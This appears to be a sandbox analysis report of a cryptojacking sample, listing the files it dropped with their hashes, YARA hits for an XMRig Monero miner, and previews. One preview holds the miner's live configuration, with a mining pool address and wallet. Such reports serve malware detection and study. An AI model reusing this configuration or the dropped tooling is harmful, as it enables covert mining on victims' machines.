                                                                                                                                                            SHA-256:704451620376B9471D879EA082E00BDB21867F2EF779236268D81CD8D7FD929D
                                                                                                                                                            SHA-512:5E2BD949EFFF8B21AB93108803C1BEC21ACC91552E90EC4CEA7E6242418BF0881FECFCF1BF866B73274CBD726C2C99B5E17D44D56D729511335E21C82673F8F8
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.3.5.2.<./.P.i.d.>.......

                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER8757.tmp.xml

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):4719
                                                                                                                                                            Entropy (8bit):4.421050302942389
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:cvIwSD8zsm+JgtBI92oWgc8sqYjk8fm8M4JM0FDHyq8vP8bwPfd:uITfxkBgrsqYdJ1HW0byfd
                                                                                                                                                            MD5:C1A3B40A9B363651A9D42693155F6FC2
                                                                                                                                                            SHA1:F98D62177145BDDBB1E0046B49E263A1C5062EC7
                                                                                                                                                            SHA-256:299E5A9FD542847E81EB6D4FD085C52CBE6E97F4B7C5BCCA66B2E217A0EBA167
                                                                                                                                                            SHA-512:AFBE2EC09BB0A3CB1AE4287272FBFB7979BAD91E9CB18D892E1BC069D425CA0C02116225CADE00D7CA89B7071D1B075C3D9BA8CD5BB53826AB946B464B204C30
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1592222" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER8AA2.tmp.csv

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):62636
                                                                                                                                                            Entropy (8bit):3.0538148450457103
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:1536:CfHS5QChoaav4HqEQ5Uebw05Qhdb/Ig/0BEnlWj2:CfHS5QChoaav4HqEQ5U8w05Qhdb/Ig/h
                                                                                                                                                            MD5:4D55C3C8584117123284A4DB8C01EF20
                                                                                                                                                            SHA1:3BA60754DC11E0B65647CCD486851D7313FF29B6
                                                                                                                                                            SHA-256:0EEF4797B23E29B33B9C4626D3F132804BA9D5AF29F4849CA9D4B7D76CDA5F90
                                                                                                                                                            SHA-512:09E1D2C97C7950DEA182D493FEC6B64C1895C3F07DF92B5F768D00266EC29D02325FDD98E97ACF0445661076E6906F20F8B4B7DC2BD6B51C5F783E9A22CC2B72
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER936D.tmp.txt

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):13340
                                                                                                                                                            Entropy (8bit):2.700404774451927
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:96:kiZYWhDheKRYTY7WOHgYEZ0MtoiX9FfKwQPSaAKR22UIRu3:hZDhBECzKaAKR22DRu3
                                                                                                                                                            MD5:C41D0BF232ADBEBBA71984652E92B81A
                                                                                                                                                            SHA1:F5A6C6DB80FE36A0E48A19963889BE447F357EB5
                                                                                                                                                            SHA-256:ACB7CA11796532314459BF1E79F3F02CBC4DA77AC69254CD7D23EA1E869572BC
                                                                                                                                                            SHA-512:A5D0B2B958D7F35B709A1D6EF3EF166B80A093F82B1767F47DAFC7437A03473F474CE9D3263747D9187D1EBE0BC61B0E15DCBD177CA840D2E4B452795661E1A3
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.2.6.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

                                                                                                                                                            C:\ProgramData\Systemd\CPU.zip

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\DllHost.exe
                                                                                                                                                            File Type:Zip archive data, at least v2.0 to extract
                                                                                                                                                            Category:modified
                                                                                                                                                            Size (bytes):3426927
                                                                                                                                                            Entropy (8bit):7.999956157057277
                                                                                                                                                            Encrypted:true
                                                                                                                                                            SSDEEP:98304:ckycvd8QGwy1q8iuaYe6wxHf97TqJfZojN2Sqguteh:c4vKky1q8iuU6wxHJqsh2c
                                                                                                                                                            MD5:9717DF35202BD7076B9F3AFD8D1CEAC6
                                                                                                                                                            SHA1:F714BA97EC0A57B42FC7CFD2057B3FEB65EA1DD8
                                                                                                                                                            SHA-256:302BCC03779BE5607843229269B974CC7131B3D2B149A4600CCA25F37BFD5564
                                                                                                                                                            SHA-512:378697C85724A97A1A7130EA060C49BA307C1818D01ED0B9B0F34EC9E6F23DF485B50E2F977F42F98089B64EF5AC4EF5B637105D04719649DE43340F05055097
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:PK..........T.%^t............config.txt...O...RK.&?i:............J(...i..m...+^.5#}...l@R+:..O...._..$5...a..4[.;9..k..F:..xI.....U..6.._a}.$Y.../....*.DzF.Qs..8..t.#~..15PK...%^t........PK........!..TY.E.............name.txt......n.....(v7......+FG.PK..Y.E.........PK...........T................process.txt.l;.m......wPK..............PK..........TER..QG4...~.....procexp.exe.X..[...j.8<.g..._...e[W.0.C..8......`R.*..d.e.5`...:i..5.)F. ....C.'U...{J$^..`h;.."........| w2.}+....}D.r8.Z.8.n.h......J<.9/..M.k....D...H.>.(j..5Bf.V.c..._./9.:..8..Q...=.W.o:..~8.0......_...h.sp.3..5.c..<.!..i`X...}7..A......mx......K......N...m..!..X......7r...5.{+...S.... =...Vwv...&..o........M.,.(+.xO..@....j.|}.....nO..b..U...o...R.....:..$<A.....&6...1Y..2N......."m&.vM@..X<..w"...W9."@E.+zj..4.Q..j+HGh...R..+..H.H...S&|.......zh.c.k....Q...,..".71..P.7,..2<&..@.M]!..!."2...i.......U........G....LN..C.2. .f~?.\ZK....x!C.3.y......%.d....iC.Y.. ...?Fx#:.ulG..G

                                                                                                                                                            C:\ProgramData\Systemd\config.txt

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\DllHost.exe
                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):140
                                                                                                                                                            Entropy (8bit):5.511905096278849
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:07ghKTEQfhX0dcTJV5tTI3U4t3A9RVQccOSNV82G11iW0Rx/e:+T5fhXvTJ9TP4tw9zQtOO7W0RVe
                                                                                                                                                            MD5:36AB4B5EC9915CB9A901CF97A1B42AD5
                                                                                                                                                            SHA1:86CC25C67E880C340FB2AADFC68504D637BD5E49
                                                                                                                                                            SHA-256:9D4F00219C5F00553FA62BBE13FBFC2E1E8F8A29FB1EC9FDC7815DDD81DA416C
                                                                                                                                                            SHA-512:5BDEC2150313D2E0F6B22420FF5A19BE04422306C2CB1621BCEEA8DBA8E6DA4D64F12850FD81E20CA4CF89D1E8D57F0D453165A42AF37B94E6F25599E6C3E270
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview: --url pool.hashvault.pro:80 --user 42kFTbPkrpEY8KRSdRjzLpawdNvmR1BTKPRfaaGoq9TcDNhnKapy9G99eH9AsJon766YDYnKEobxycNSDuHbPG3JHV5zKut --pass x

                                                                                                                                                            C:\ProgramData\Systemd\name.txt

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\DllHost.exe
                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):11
                                                                                                                                                            Entropy (8bit):2.663532754804255
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:orN:op
                                                                                                                                                            MD5:BA376C627EBAAC190156D40655DE5FCE
                                                                                                                                                            SHA1:19F1E403E36C397A39E9A2CABBBE7AF8F116D1FD
                                                                                                                                                            SHA-256:A5A5B6257304EEFE5212EDFD8C0AD27F77357C5046A7ACB8EB7BA72ED4BAD9E0
                                                                                                                                                            SHA-512:8C08C82DDB59F7FF515D840175D9992C4D5A293140661BD764EBFD05FD6185E595D5E18D9601E348C62F38DBCD3122EBBB64ED05592EBE92CA1FF8BA19DE164B
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:procexp.exe

                                                                                                                                                            C:\ProgramData\Systemd\old.exe (copy)

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\ProgramData\MicrosoftNetwork\System.exe
                                                                                                                                                            File Type:PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):8305064
                                                                                                                                                            Entropy (8bit):6.637817318661622
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:98304:EeSdMeEZvlEVuaMYPShvXAaiW5DjocFtZLj2XMSpZVqWyOmsqndFt3BQgEBHQ+zA:/flEiI9Wt3YLkqpnmNK/ysxfWdIjFe
                                                                                                                                                            MD5:2D9FB9ED8BEBB55280B81A4652DCFA11
                                                                                                                                                            SHA1:76300E059E74D8CFC99A736917CD3A512DD32CAB
                                                                                                                                                            SHA-256:573FC41AE5B597CBB3E2255224013AA861D23B6608B2EFEF20685FF393E6B8BF
                                                                                                                                                            SHA-512:AE984A21CBF9C556407AD8EE60C07342884D5905CD0E9AECE195ED44CCA82D434B24DA931BE346E1CECEA8FCA856AF6DD3DCD2994F95F5895647FE029650CE9C
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....ZLb...............&.._...~...2............@...................................*.~...`... .................................................E...P........w.......~..#...`.............................. .u.(...................................................text....._......._.................`..`.data...`....._......._.............@....rdata.. I....`..J....`.............@..@.pdata........w.......w.............@..@.xdata.......z.......y.............@..@.bss....`.2...}..........................idata...E......F....}.............@....CRT....h....0........}.............@....tls.........@........}.............@....rsrc........P........}.............@....reloc.......`........~.............@..B........................................................................................................................................................................

                                                                                                                                                            C:\ProgramData\Systemd\procexp.exe

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\DllHost.exe
                                                                                                                                                            File Type:PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):8305064
                                                                                                                                                            Entropy (8bit):6.637817318661622
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:98304:EeSdMeEZvlEVuaMYPShvXAaiW5DjocFtZLj2XMSpZVqWyOmsqndFt3BQgEBHQ+zA:/flEiI9Wt3YLkqpnmNK/ysxfWdIjFe
                                                                                                                                                            MD5:2D9FB9ED8BEBB55280B81A4652DCFA11
                                                                                                                                                            SHA1:76300E059E74D8CFC99A736917CD3A512DD32CAB
                                                                                                                                                            SHA-256:573FC41AE5B597CBB3E2255224013AA861D23B6608B2EFEF20685FF393E6B8BF
                                                                                                                                                            SHA-512:AE984A21CBF9C556407AD8EE60C07342884D5905CD0E9AECE195ED44CCA82D434B24DA931BE346E1CECEA8FCA856AF6DD3DCD2994F95F5895647FE029650CE9C
                                                                                                                                                            Malicious:true
                                                                                                                                                            Yara Hits:
                                                                                                                                                            • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: C:\ProgramData\Systemd\procexp.exe, Author: Florian Roth
                                                                                                                                                            • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\ProgramData\Systemd\procexp.exe, Author: Joe Security
                                                                                                                                                            • Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: C:\ProgramData\Systemd\procexp.exe, Author: ditekSHen
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....ZLb...............&.._...~...2............@...................................*.~...`... .................................................E...P........w.......~..#...`.............................. .u.(...................................................text....._......._.................`..`.data...`....._......._.............@....rdata.. I....`..J....`.............@..@.pdata........w.......w.............@..@.xdata.......z.......y.............@..@.bss....`.2...}..........................idata...E......F....}.............@....CRT....h....0........}.............@....tls.........@........}.............@....rsrc........P........}.............@....reloc.......`........~.............@..B........................................................................................................................................................................

                                                                                                                                                            C:\ProgramData\UpSys.exe

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\DllHost.exe
                                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):945944
                                                                                                                                                            Entropy (8bit):6.654096172451499
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24576:X2DW/xbMX2YIbxQsu3/PNLoQ+HyS2I4jRk:X2EgXoQsW/PNUQWnX4jRk
                                                                                                                                                            MD5:EFE5769E37BA37CF4607CB9918639932
                                                                                                                                                            SHA1:F24CA204AF2237A714E8B41D54043DA7BBE5393B
                                                                                                                                                            SHA-256:5F9DFD9557CF3CA96A4C7F190FC598C10F8871B1313112C9AEA45DC8443017A2
                                                                                                                                                            SHA-512:33794A567C3E16582DA3C2AC8253B3E61DF19C255985277C5A63A84A673AC64899E34E3B1EBB79E027F13D66A0B8800884CDD4D646C7A0ABE7967B6316639CF1
                                                                                                                                                            Malicious:true
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i.@............yGI......p\.}....pJ......p[.............._.....................pP......ZJ......ZK.......H......pN.....Rich............................PE..d...(..K..........#......\...*......|..........@.....................................N........@...............@.................................T................j...Q.. ............................................................p...............................text....Z.......\.................. ..`.rdata...V...p...X...`..............@..@.data............v..................@....pdata...j.......l..................@..@.rsrc...............................@..@................................................................................................................................................................................................................................................................

                                                                                                                                                            C:\ProgramData\check.txt

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1
                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:U:U
                                                                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:1

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\AZQSKQ2F.txt

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\DllHost.exe
                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):14
                                                                                                                                                            Entropy (8bit):2.6455933144511468
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:MXgMgRV:MwMgRV
                                                                                                                                                            MD5:86FE0830AADF7C9B32B144D5FE4AAE11
                                                                                                                                                            SHA1:ADDB343F247F84A0276CA2565F52EEE3D2BF5F26
                                                                                                                                                            SHA-256:80A3A6662B771C9B0763C3C3CFF8F6339EAFB72774C9F698FFD9ACAFF593654F
                                                                                                                                                            SHA-512:5B3BAC11284E15F57217C0FE015A6D0C26F34397A5E15C038DC3E611217651F8CCB3BBEE5969215005F6E8A7DAE0E9E184E83E72BBA520F34C629DE39114B4BE
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:102.129.143.92

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\CPU[1].zip

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\DllHost.exe
                                                                                                                                                            File Type:Zip archive data, at least v2.0 to extract
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):3426927
                                                                                                                                                            Entropy (8bit):7.999956157057277
                                                                                                                                                            Encrypted:true
                                                                                                                                                            SSDEEP:98304:ckycvd8QGwy1q8iuaYe6wxHf97TqJfZojN2Sqguteh:c4vKky1q8iuU6wxHJqsh2c
                                                                                                                                                            MD5:9717DF35202BD7076B9F3AFD8D1CEAC6
                                                                                                                                                            SHA1:F714BA97EC0A57B42FC7CFD2057B3FEB65EA1DD8
                                                                                                                                                            SHA-256:302BCC03779BE5607843229269B974CC7131B3D2B149A4600CCA25F37BFD5564
                                                                                                                                                            SHA-512:378697C85724A97A1A7130EA060C49BA307C1818D01ED0B9B0F34EC9E6F23DF485B50E2F977F42F98089B64EF5AC4EF5B637105D04719649DE43340F05055097
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:PK..........T.%^t............config.txt...O...RK.&?i:............J(...i..m...+^.5#}...l@R+:..O...._..$5...a..4[.;9..k..F:..xI.....U..6.._a}.$Y.../....*.DzF.Qs..8..t.#~..15PK...%^t........PK........!..TY.E.............name.txt......n.....(v7......+FG.PK..Y.E.........PK...........T................process.txt.l;.m......wPK..............PK..........TER..QG4...~.....procexp.exe.X..[...j.8<.g..._...e[W.0.C..8......`R.*..d.e.5`...:i..5.)F. ....C.'U...{J$^..`h;.."........| w2.}+....}D.r8.Z.8.n.h......J<.9/..M.k....D...H.>.(j..5Bf.V.c..._./9.:..8..Q...=.W.o:..~8.0......_...h.sp.3..5.c..<.!..i`X...}7..A......mx......K......N...m..!..X......7r...5.{+...S.... =...Vwv...&..o........M.,.(+.xO..@....j.|}.....nO..b..U...o...R.....:..$<A.....&6...1Y..2N......."m&.vM@..X<..w"...W9."@E.+zj..4.Q..j+HGh...R..+..H.H...S&|.......zh.c.k....Q...,..".71..P.7,..2<&..@.M]!..!."2...i.......U........G....LN..C.2. .f~?.\ZK....x!C.3.y......%.d....iC.Y.. ...?Fx#:.ulG..G

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\UpSys[1].exe

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\DllHost.exe
                                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):945944
                                                                                                                                                            Entropy (8bit):6.654096172451499
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24576:X2DW/xbMX2YIbxQsu3/PNLoQ+HyS2I4jRk:X2EgXoQsW/PNUQWnX4jRk
                                                                                                                                                            MD5:EFE5769E37BA37CF4607CB9918639932
                                                                                                                                                            SHA1:F24CA204AF2237A714E8B41D54043DA7BBE5393B
                                                                                                                                                            SHA-256:5F9DFD9557CF3CA96A4C7F190FC598C10F8871B1313112C9AEA45DC8443017A2
                                                                                                                                                            SHA-512:33794A567C3E16582DA3C2AC8253B3E61DF19C255985277C5A63A84A673AC64899E34E3B1EBB79E027F13D66A0B8800884CDD4D646C7A0ABE7967B6316639CF1
                                                                                                                                                            Malicious:false
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i.@............yGI......p\.}....pJ......p[.............._.....................pP......ZJ......ZK.......H......pN.....Rich............................PE..d...(..K..........#......\...*......|..........@.....................................N........@...............@.................................T................j...Q.. ............................................................p...............................text....Z.......\.................. ..`.rdata...V...p...X...`..............@..@.data............v..................@....pdata...j.......l..................@..@.rsrc...............................@..@................................................................................................................................................................................................................................................................

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\HETFC3U6.txt

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\ProgramData\MicrosoftNetwork\System.exe
                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):14
                                                                                                                                                            Entropy (8bit):2.6455933144511468
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:MXgMgRV:MwMgRV
                                                                                                                                                            MD5:86FE0830AADF7C9B32B144D5FE4AAE11
                                                                                                                                                            SHA1:ADDB343F247F84A0276CA2565F52EEE3D2BF5F26
                                                                                                                                                            SHA-256:80A3A6662B771C9B0763C3C3CFF8F6339EAFB72774C9F698FFD9ACAFF593654F
                                                                                                                                                            SHA-512:5B3BAC11284E15F57217C0FE015A6D0C26F34397A5E15C038DC3E611217651F8CCB3BBEE5969215005F6E8A7DAE0E9E184E83E72BBA520F34C629DE39114B4BE
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:102.129.143.92

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):18817
                                                                                                                                                            Entropy (8bit):5.004929862695359
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:384:LFTvOjJgYoIVoGIpN6KQkj2zNXp5iOdBFRib4Cz5Akjh4iUxNZrW4+ib4J:L9MgYoIV3IpNBQkj2zNZYOdBF+z55h4A
                                                                                                                                                            MD5:29429B1BD9A6645178818ED92AB9FE24
                                                                                                                                                            SHA1:CDCD3226C460D728CBACB7A9BF009BFF6A06FCDF
                                                                                                                                                            SHA-256:444CE4EFE972DB07291821B7C2CC557719CFED4B1FF7282ED3414AAFCB348FCC
                                                                                                                                                            SHA-512:0EC347C27C27A86053B3334DF065FFCAC55F350267C645F5020E2696BCDE318547D5FBFF675DFC6CDE64B9889E69349F91C2C18A766A49A07508B1EA7D9DCCF0
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
